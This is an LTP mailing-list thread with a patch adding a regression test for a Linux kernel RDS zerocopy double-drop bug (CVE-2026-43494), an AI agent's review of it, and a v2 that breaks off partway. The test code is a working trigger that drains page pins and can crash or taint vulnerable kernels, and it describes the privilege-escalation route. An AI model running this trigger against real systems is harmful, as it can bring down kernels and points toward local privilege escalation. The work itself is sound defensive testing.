* [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test
@ 2026-05-23 10:17 Sebastian Chlad
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
` (3 more replies)
0 siblings, 4 replies; 19+ messages in thread
From: Sebastian Chlad @ 2026-05-23 10:17 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
include/lapi/io_uring.h | 4 +
runtest/cve | 1 +
testcases/kernel/syscalls/io_uring/pintheft.c | 429 ++++++++++++++++++
3 files changed, 434 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..88d693053 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,10 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+# define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/runtest/cve b/runtest/cve
index 74ee8e9ba..03b4fc128 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -83,6 +83,7 @@ cve-2021-22600 setsockopt09
cve-2021-38604 mq_notify03
cve-2022-0847 dirtypipe
cve-2022-2590 dirtyc0w_shmem
+cve-2026-43494 pintheft
cve-2022-23222 bpf_prog07
cve-2023-1829 tcindex01
cve-2023-0461 setsockopt10
diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
new file mode 100644
index 000000000..8a7517353
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/pintheft.c
@@ -0,0 +1,429 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <linux/rds.h>
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 30
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/*
+ * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
+ * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
+ * RDS zerocopy send steals one of those references via the double-drop bug.
+ * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
+ */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+/* io_uring IORING_REGISTER_CLONE_BUFFERS argument. */
+struct clone_buffers_arg {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t pad[6];
+};
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static int buffer_registered;
+static int buffer_cloned;
+static long page_size;
+static void *mapped_pages;
+
+static void cleanup(void);
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct clone_buffers_arg clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring.
+ */
+ ring_fd1 = io_uring_setup(1, ¶ms);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(¶ms, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, ¶ms);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
+ errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1)) {
+ if (errno == ENOMEM)
+ tst_brk(TCONF, "Not enough memory to register io_uring buffer");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+ }
+
+ buffer_registered = 1;
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+
+ buffer_cloned = 1;
+}
+
+static void trigger(void)
+{
+ /*
+ * Derive RDS ports from the process ID so concurrent test instances
+ * do not collide in the RDS port namespace.
+ */
+ const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port),
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port + 1),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to one loopback RDS port and send to another unbound local port.
+ * The sends are expected to fail before any useful delivery; the faulting
+ * iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
+ * and page 1 is PROT_NONE. Each attempt should:
+ * 1. Pin page 0 successfully.
+ * 2. Fault on page 1, so RDS error path drops page 0's reference.
+ * 3. RDS message cleanup drops page 0's reference again (the bug).
+ *
+ * On a vulnerable kernel this steals one FOLL_PIN reference per
+ * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
+ * Unregistering the io_uring fixed buffer then tries to unpin a page
+ * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
+ * and taint.
+ *
+ * EFAULT is the expected error because page 1 is PROT_NONE. Other
+ * errors do not count as successful pin-theft iterations.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang here or during
+ * cleanup() below.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ /*
+ * Unregistering fixed buffers on a vulnerable kernel triggers a
+ * double-unpin: io_uring tries to release references that the RDS bug
+ * already dropped, which may produce a kernel WARN or BUG_ON and taint.
+ */
+ cleanup();
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int status;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Create short-lived children that dirty and release anonymous memory to
+ * encourage RSS accounting checks before the parent reports success.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ /*
+ * Unregister the clone first, then the source registration.
+ * Order matters: on a vulnerable kernel, unregistering ring_fd1
+ * (the original) after the FOLL_PIN references have been drained
+ * is what triggers the double-unpin WARN/BUG_ON.
+ */
+ if (buffer_cloned) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_cloned = 0;
+ }
+
+ if (buffer_registered) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_registered = 0;
+ }
+
+ if (ring_fd2 >= 0) {
+ SAFE_CLOSE(ring_fd2);
+ ring_fd2 = -1;
+ }
+
+ if (ring_fd1 >= 0) {
+ SAFE_CLOSE(ring_fd1);
+ ring_fd1 = -1;
+ }
+
+ if (rds_fd >= 0) {
+ SAFE_CLOSE(rds_fd);
+ rds_fd = -1;
+ }
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
@ 2026-05-23 11:19 ` linuxtestproject.agent
2026-05-25 9:36 ` Cyril Hrubis
2026-05-23 11:39 ` [LTP] [PATCH v2] " Sebastian Chlad
` (2 subsequent siblings)
3 siblings, 1 reply; 19+ messages in thread
From: linuxtestproject.agent @ 2026-05-23 11:19 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Sat, 23 May 2026, Sebastian Chlad wrote:
> io_uring/pintheft: Add CVE-2026-43494 regression test
The commit author address (sebastianchlad@gmail.com) does not match the
Signed-off-by address (sebastian.chlad@suse.com). Either add a .mailmap
entry or re-send with a consistent identity.
> diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
> [...]
> +#ifndef IORING_REGISTER_CLONE_BUFFERS
> +# define IORING_REGISTER_CLONE_BUFFERS 30
> +#endif
Use `#define` without the extra space after `#`. All other fallback
defines in this file use `#define`, not `# define`.
> diff --git a/runtest/cve b/runtest/cve
> [...]
> +cve-2026-43494 pintheft
Wrong placement. The new entry lands between `cve-2022-2590` and
`cve-2022-23222`, in the middle of the 2022 block.
The pintheft test can crash, taint, or panic a vulnerable kernel
("Vulnerable kernels may crash, taint, panic, or hang during sendmsg()
or subsequent cleanup."). It belongs in the section below the
"Tests below may cause kernel memory leak" comment, in CVE-number order:
```
cve-2026-43284 xfrm01
+cve-2026-43494 pintheft
cve-2026-46300 xfrm02
```
[...]
The test logic itself looks correct: the child triggers the double-drop
via the IORING_UNREGISTER_BUFFERS path, the parent monitors for taint
across the RSS accounting sweep and the 30-second async cleanup window,
and all resources are properly guarded in cleanup(). Kernel version
checks (io_uring ≥ 5.1, RDS/TCP TCONF handling, io_uring_disabled
save/restore) are in order. Based on kernel 7.1 as the current stable
reference, no staging flag is required.
---
Note:
Our agent completed the review of the patch. The full review can be
found at: (REVIEW_URL not set)
The agent can sometimes produce false positives, although its findings
are often genuine. If you find issues with the review, please reply to
this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* [LTP] [PATCH v2] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
@ 2026-05-23 11:39 ` Sebastian Chlad
2026-05-23 13:30 ` [LTP] " linuxtestproject.agent
2026-05-23 15:10 ` [LTP] [PATCH v3] " Sebastian Chlad
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
3 siblings, 1 reply; 19+ messages in thread
From: Sebastian Chlad @ 2026-05-23 11:39 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
v2: Address AI review findings:
- Fix # define -> #define in lapi/io_uring.h
- Move runtest/cve entry to the "may cause kernel memory leak" section
include/lapi/io_uring.h | 4 +
runtest/cve | 1 +
testcases/kernel/syscalls/io_uring/pintheft.c | 429 ++++++++++++++++++
3 files changed, 434 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..1d54ff716 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,10 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+#define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/runtest/cve b/runtest/cve
index 74ee8e9ba..32a0f237d 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -95,4 +95,5 @@ cve-2025-38236 cve-2025-38236
cve-2025-21756 cve-2025-21756
cve-2026-31431 af_alg08
cve-2026-43284 xfrm01
+cve-2026-43494 pintheft
cve-2026-46300 xfrm02
diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
new file mode 100644
index 000000000..8a7517353
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/pintheft.c
@@ -0,0 +1,429 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <linux/rds.h>
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 30
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/*
+ * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
+ * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
+ * RDS zerocopy send steals one of those references via the double-drop bug.
+ * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
+ */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+/* io_uring IORING_REGISTER_CLONE_BUFFERS argument. */
+struct clone_buffers_arg {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t pad[6];
+};
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static int buffer_registered;
+static int buffer_cloned;
+static long page_size;
+static void *mapped_pages;
+
+static void cleanup(void);
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct clone_buffers_arg clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring.
+ */
+ ring_fd1 = io_uring_setup(1, ¶ms);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(¶ms, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, ¶ms);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
+ errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1)) {
+ if (errno == ENOMEM)
+ tst_brk(TCONF, "Not enough memory to register io_uring buffer");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+ }
+
+ buffer_registered = 1;
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+
+ buffer_cloned = 1;
+}
+
+static void trigger(void)
+{
+ /*
+ * Derive RDS ports from the process ID so concurrent test instances
+ * do not collide in the RDS port namespace.
+ */
+ const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port),
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port + 1),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to one loopback RDS port and send to another unbound local port.
+ * The sends are expected to fail before any useful delivery; the faulting
+ * iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
+ * and page 1 is PROT_NONE. Each attempt should:
+ * 1. Pin page 0 successfully.
+ * 2. Fault on page 1, so RDS error path drops page 0's reference.
+ * 3. RDS message cleanup drops page 0's reference again (the bug).
+ *
+ * On a vulnerable kernel this steals one FOLL_PIN reference per
+ * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
+ * Unregistering the io_uring fixed buffer then tries to unpin a page
+ * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
+ * and taint.
+ *
+ * EFAULT is the expected error because page 1 is PROT_NONE. Other
